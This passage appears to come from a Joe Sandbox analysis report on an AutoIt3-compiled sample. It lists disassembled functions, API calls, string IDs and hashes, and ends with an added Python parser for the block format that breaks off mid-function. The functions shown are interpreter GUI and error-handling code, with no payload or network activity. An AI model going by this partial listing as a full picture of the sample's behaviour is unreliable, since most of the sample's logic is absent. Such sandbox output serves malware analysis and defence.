                                                                      • _wcsstr.LIBCMT ref: 0100452C
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01004548
                                                                      • _wcscat.LIBCMT ref: 01004591
                                                                      • _wcscat.LIBCMT ref: 01004598
                                                                      • _wcsncpy.LIBCMT ref: 010045C3
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 699586101-1459072770
                                                                      • Opcode ID: 94991a8144f7826f06a1fa23d901b00da474b63cb76dc11aa5bbb375e921cc4e
                                                                      • Instruction ID: c41b25f83a64257a76bd3c2a1e7819175bfb5f0ae39f4196262be43704a11a5b
                                                                      • Opcode Fuzzy Hash: 94991a8144f7826f06a1fa23d901b00da474b63cb76dc11aa5bbb375e921cc4e
                                                                      • Instruction Fuzzy Hash: 3F412871940202BAEB11AA75CD03FBF77BCDF45750F04445EFA41E6182EF39AA01A6A9
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28BC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00FA28C4
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28EF
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00FA28F7
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00FA291C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FA2939
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FA2949
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FA297C
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FA2990
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00FA29AE
                                                                      • GetStockObject.GDI32(00000011), ref: 00FA29CA
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA29D5
                                                                        • Part of subcall function 00FA2344: GetCursorPos.USER32(?), ref: 00FA2357
                                                                        • Part of subcall function 00FA2344: ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                        • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                        • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00FA1256), ref: 00FA29FC
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
                                                                      • Instruction ID: 844bb4d1f33365299abaa2bf2cff98980047e73a52773a858566ca88371e1f4d
                                                                      • Opcode Fuzzy Hash: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
                                                                      • Instruction Fuzzy Hash: 32B19F71A0020AEFDB24DFA8DC45BAE7BB5FB08350F10422AFA55E7294DB79D841DB50
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FFA47A
                                                                      • __swprintf.LIBCMT ref: 00FFA51B
                                                                      • _wcscmp.LIBCMT ref: 00FFA52E
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FFA583
                                                                      • _wcscmp.LIBCMT ref: 00FFA5BF
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00FFA5F6
                                                                      • GetDlgCtrlID.USER32(?), ref: 00FFA648
                                                                      • GetWindowRect.USER32(?,?), ref: 00FFA67E
                                                                      • GetParent.USER32(?), ref: 00FFA69C
                                                                      • ScreenToClient.USER32(00000000), ref: 00FFA6A3
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FFA71D
                                                                      • _wcscmp.LIBCMT ref: 00FFA731
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00FFA757
                                                                      • _wcscmp.LIBCMT ref: 00FFA76B
                                                                        • Part of subcall function 00FC362C: _iswctype.LIBCMT ref: 00FC3634
                                                                      Similarity
                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                      • String ID: %s%u
                                                                      • API String ID: 3744389584-679674701
                                                                      • Opcode ID: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
                                                                      • Instruction ID: 334840f84904656b8323df249f60a2a5fa7110335cbb34aa756d06357b343ec6
                                                                      • Opcode Fuzzy Hash: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
                                                                      • Instruction Fuzzy Hash: 14A1D3B260430BABD714EF60C884FBAB7E8FF44354F148519EA9DD2160DB34E945DB92
                                                                      APIs
                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00FFAF18
                                                                      • _wcscmp.LIBCMT ref: 00FFAF29
                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FFAF51
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00FFAF6E
                                                                      • _wcscmp.LIBCMT ref: 00FFAF8C
                                                                      • _wcsstr.LIBCMT ref: 00FFAF9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FFAFD5
                                                                      • _wcscmp.LIBCMT ref: 00FFAFE5
                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FFB00C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FFB055
                                                                      • _wcscmp.LIBCMT ref: 00FFB065
                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00FFB08D
                                                                      • GetWindowRect.USER32(00000004,?), ref: 00FFB0F6
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                      • String ID: @$ThumbnailClass
                                                                      • API String ID: 1788623398-1539354611
                                                                      • Opcode ID: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
                                                                      • Instruction ID: 6cf4e9a3cc198a3ad7b8629fa11373839c71db32af288262981aff68e5582b20
                                                                      • Opcode Fuzzy Hash: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
                                                                      • Instruction Fuzzy Hash: 1881C1B140830A9BDB14DF10C885FBA77E8EF44764F148469FE898A0A5DB34DD49EB61
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                      • API String ID: 1038674560-1810252412
                                                                      • Opcode ID: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                      • Instruction ID: ea5ce1e509f04e586d2a5867b075fbfb7dd4380f7a6b792a2c81cb1d61841b3b
                                                                      • Opcode Fuzzy Hash: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                      • Instruction Fuzzy Hash: 2E31B0B1A44209A6DB14FBA1DE43FBF77A4AF10760FA0001CB945750A5EB55AF04F652
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 01015013
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0101501E
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 01015029
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 01015034
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0101503F
                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0101504A
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 01015055
                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 01015060
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0101506B
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 01015076
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 01015081
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0101508C
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 01015097
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 010150A2
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 010150AD
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 010150B8
                                                                      • GetCursorInfo.USER32(?), ref: 010150C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$Info
                                                                      • String ID:
                                                                      • API String ID: 2577412497-0
                                                                      • Opcode ID: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
                                                                      • Instruction ID: 951fc081ab20b3c37b8779f8a312764ae4b813816e1a4847adb432471f87efd9
                                                                      • Opcode Fuzzy Hash: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
                                                                      • Instruction Fuzzy Hash: 393115B1D0831A6ADF609FBA8C8985EBFF8FF04750F50452AE54CEB280DA7C65008F91
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0102A259
                                                                      • DestroyWindow.USER32(?,?), ref: 0102A2D3
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0102A34D
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0102A36F
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A382
                                                                      • DestroyWindow.USER32(00000000), ref: 0102A3A4
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 0102A3DB
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A3F4
                                                                      • GetDesktopWindow.USER32 ref: 0102A40D
                                                                      • GetWindowRect.USER32(00000000), ref: 0102A414
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0102A42C
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0102A444
                                                                        • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 1297703922-3619404913
                                                                      • Opcode ID: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
                                                                      • Instruction ID: 6c49d2afdca8d2be619a202bdf88c52bdc4ba47e8a2fa490ef89000a1056db08
                                                                      • Opcode Fuzzy Hash: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
                                                                      • Instruction Fuzzy Hash: E6719A75240205AFE721CF28CC49F6A7BE5FB89740F04455CFAC5976A0CB79E906CB62
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0102C627
                                                                        • Part of subcall function 0102AB37: ClientToScreen.USER32(?,?), ref: 0102AB60
                                                                        • Part of subcall function 0102AB37: GetWindowRect.USER32(?,?), ref: 0102ABD6
                                                                        • Part of subcall function 0102AB37: PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0102C690
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0102C69B
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0102C6BE
                                                                      • _wcscat.LIBCMT ref: 0102C6EE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0102C705
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0102C71E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0102C735
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0102C757
                                                                      • DragFinish.SHELL32(?), ref: 0102C75E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0102C851
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 169749273-3440237614
                                                                      • Opcode ID: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
                                                                      • Instruction ID: bbf90f7753c11733a0ba7c42b59dbc002f193c2d3b3863138e8607b5aa94773f
                                                                      • Opcode Fuzzy Hash: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
                                                                      • Instruction Fuzzy Hash: AA618971108301AFC721EF64CD89DAFBBF8EF89790F40091EF591961A1DB75AA09CB52
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 01007D5F
                                                                      • VariantCopy.OLEAUT32(00000000,?), ref: 01007D68
                                                                      • VariantClear.OLEAUT32(00000000), ref: 01007D74
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01007E62
                                                                      • __swprintf.LIBCMT ref: 01007E92
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 01007EBE
                                                                      • VariantInit.OLEAUT32(?), ref: 01007F6F
                                                                      • SysFreeString.OLEAUT32(00000016), ref: 01008003
                                                                      • VariantClear.OLEAUT32(?), ref: 0100805D
                                                                      • VariantClear.OLEAUT32(?), ref: 0100806C
                                                                      • VariantInit.OLEAUT32(00000000), ref: 010080AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 3730832054-3931177956
                                                                      • Opcode ID: 8d7de4fd5936ed7e15ef0ca0e6f6851b8992cb0488647ac2654e7f60576832d8
                                                                      • Instruction ID: 5f548e299a20e85432d15b954f98158a2e76a48fd5996325dd75f14e13446be8
                                                                      • Opcode Fuzzy Hash: 8d7de4fd5936ed7e15ef0ca0e6f6851b8992cb0488647ac2654e7f60576832d8
                                                                      • Instruction Fuzzy Hash: DCD1E571A00616EBEB62EF65D844BBEB7B4BF05300F10845AE5C59B2C4CF79B850CBA1
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 01024424
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0102446F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
                                                                      • Instruction ID: 6eb81fafaeff192eb595c75e87c44eaa761bbe4969cde4d81dfb57065fe82c38
                                                                      • Opcode Fuzzy Hash: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
                                                                      • Instruction Fuzzy Hash: 97918D70208311DBCB14EF14C851A6EB7E1AF95354F44486CF8D69B3A2CB79ED0ADB81
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0102B8B4
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010291C2), ref: 0102B910
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B949
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0102B98C
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B9C3
                                                                      • FreeLibrary.KERNEL32(?), ref: 0102B9CF
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0102B9DF
                                                                      • DestroyIcon.USER32(?,?,?,?,?,010291C2), ref: 0102B9EE
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0102BA0B
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0102BA17
                                                                        • Part of subcall function 00FC2EFD: __wcsicmp_l.LIBCMT ref: 00FC2F86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 1212759294-1154884017
                                                                      • Opcode ID: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                      • Instruction ID: f4c6298fcac7a0ee133e842943daf9e8f11c819c038c2702579c947b01983f89
                                                                      • Opcode Fuzzy Hash: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                      • Instruction Fuzzy Hash: 72610171A00226BEEB24DF68CD41FBE7BB8FB08710F10415AF955D60C1DBB99A80D7A0
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0100A3CB
                                                                      • GetDriveTypeW.KERNEL32 ref: 0100A418
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A460
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A497
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A4C5
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 2698844021-4113822522
                                                                      • Opcode ID: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                      • Instruction ID: 9435004e647be50d3f50ec2f71fed8ca613d0cb73bdca316e4397df2ad22becb
                                                                      • Opcode Fuzzy Hash: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                      • Instruction Fuzzy Hash: CD5158B52083059FD740EF25CC81C6BB7E4EF89758F40886DF89657291DB39AD0ACB52
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FFF8DF
                                                                      • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF8E8
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • GetModuleHandleW.KERNEL32(00000000,01065310,?,00000FFF,?,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FFF90A
                                                                      • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF90D
                                                                      • __swprintf.LIBCMT ref: 00FFF95D
                                                                      • __swprintf.LIBCMT ref: 00FFF96E
                                                                      • _wprintf.LIBCMT ref: 00FFFA17
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FFFA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 984253442-2268648507
                                                                      • Opcode ID: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                      • Instruction ID: 5bf6d4a4bfdd4942583570344cb57abc2cf1407992f0dc545256fdeb2f723ee0
                                                                      • Opcode Fuzzy Hash: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                      • Instruction Fuzzy Hash: 8C4141B280020DAACF14FBE1DD46EFE7778AF19750F500065F505B60A6EA395F09EB61
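The function blocks above (cursor loading, tooltip windows, drag/drop handling, the "Line %d (File "%s"):" error dialog, CD-tray MCI commands, picture loading) are the GUI and error-reporting scaffolding of the AutoIt3 interpreter that the report identifies this sample as, not the embedded script's own logic. The Python below is an added example, not Joe Sandbox or AutoIt code: it parses this block format into per-function records (direct API calls, calls made via sub-functions, the String ID set and the API String ID) and flags blocks whose strings are interpreter strings, so that reviewers can skip them and read the unclassified blocks. The marker list is a heuristic assumption built from strings visible in this listing, and SAMPLE is constructed in the page's format from a few of the blocks above.

```python
# Parse Joe Sandbox per-function API listings (the block format on this page) and flag
# blocks whose strings belong to the stock AutoIt3 runtime. Added example, not Joe Sandbox
# or AutoIt code; SAMPLE is constructed from the listing and the marker list is an assumption.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API-call bullet: "Name.MODULE(args), ref: ADDR", "Name.MODULE ref: ADDR" (no argument
# list), or "Part of subcall function CALLEE: Name.MODULE(...), ref: ADDR" for a callee's call.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Strings of the AutoIt3 interpreter itself, not of any particular script (assumption, taken
# from this listing: the @GUI_* drag/drop macros and the runtime's error-dialog formats).
AUTOIT_RUNTIME_MARKERS = frozenset({
    "@GUI_DRAGFILE", "@GUI_DRAGID", "@GUI_DROPID",
    'Line %d (File "%s"):', "%s (%d) : ==> %s: %s %s",
})

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address in the memory dump
    callee: Optional[str] = None  # set when the call happens inside a sub-function

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: str = ""       # "<api hash>-<string hash>"; second part is 0 with no strings

    def direct_apis(self) -> List[str]:
        return sorted({f"{c.name}.{c.module}" for c in self.calls if c.callee is None})

    def autoit_runtime_markers(self) -> List[str]:
        return sorted(s for s in self.strings if s in AUTOIT_RUNTIME_MARKERS)

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Each 'APIs' header opens a new block; section headers and dump metadata are skipped."""
    blocks: List[FunctionBlock] = []
    for raw in text.splitlines():
        line = raw.lstrip().lstrip("• ")      # drop indentation and the bullet
        head = line.rstrip()
        if head == "APIs":
            blocks.append(FunctionBlock())
        elif not blocks:
            continue
        elif line.startswith("String ID:"):
            # '$' separates strings; spaces inside a string are significant ("Error: ").
            rest = line[len("String ID:"):]
            rest = rest[1:] if rest.startswith(" ") else rest
            blocks[-1].strings = rest.split("$") if rest else []
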